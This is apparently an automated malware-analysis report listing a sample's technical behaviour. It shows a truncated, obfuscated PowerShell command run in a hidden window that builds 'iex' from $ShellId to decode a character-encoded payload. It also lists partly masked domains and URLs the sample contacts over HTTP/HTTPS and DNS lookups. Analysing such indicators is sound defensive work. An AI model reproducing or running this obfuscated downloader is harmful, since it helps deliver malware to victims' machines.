Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $sHeLLID[1]+$sheLLiD[13]+'x') (" $(SeT-iTEm 'vArIabLe:ofs' '' ) "+[sTRing]('42%74,69u127!71u74A111,46N51%46,96!107!121!35,97&108!100M107%109u122%46&124M111%96j106!97A99A53!42f79N123,86A101&...
- 'ba####apital.com':80
- 'al###ost.com':80
- 'di####airclaims.com':80
- 'di####airclaims.com':443
- http://www.ba####apital.com/c8CouZB/
- http://www.di####airclaims.com/haLhb0U/
- 'di####airclaims.com':443
- DNS ASK ba####apital.com
- DNS ASK al###ost.com
- DNS ASK de####esellers.tk
- DNS ASK di####airclaims.com
- DNS ASK is####tokaporta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $sHeLLID[1]+$sheLLiD[13]+'x') (" $(SeT-iTEm 'vArIabLe:ofs' '' ) "+[sTRing]('42%74,69u127!71u74A111,46N51%46,96!107!121!35,97&108!100M107%109u122%46&124M111%96j106!97A99A53!42f79N123,86A101&...' (with hidden window)